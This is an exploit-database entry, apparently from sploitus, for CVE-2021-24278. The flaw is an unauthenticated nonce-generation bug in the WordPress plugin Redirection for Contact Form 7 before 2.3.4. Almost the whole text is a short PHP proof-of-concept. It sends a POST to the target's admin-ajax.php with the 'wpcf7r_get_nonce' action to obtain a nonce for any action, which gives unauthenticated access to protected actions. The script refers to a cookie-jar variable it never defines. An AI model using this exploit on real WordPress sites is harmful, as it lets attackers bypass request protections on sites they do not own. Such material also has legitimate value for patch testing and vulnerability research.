Exploit for Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation CVE-2021-24278

Name: Exploit for Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation CVE-2021-24278
Rating: 5 (154 reviews)

2021-04-20 | CVSS 5.0

## https://sploitus.com/exploit?id=WPEX-ID:99F30604-D62B-4E30-AFCD-B482F8D66413
<?php
// Settings
$wp_url = $argv[1];

// Get nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
   'action' =>  'wpcf7r_get_nonce',
   'param' => '[ANY ACTION HERE]'

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);


?>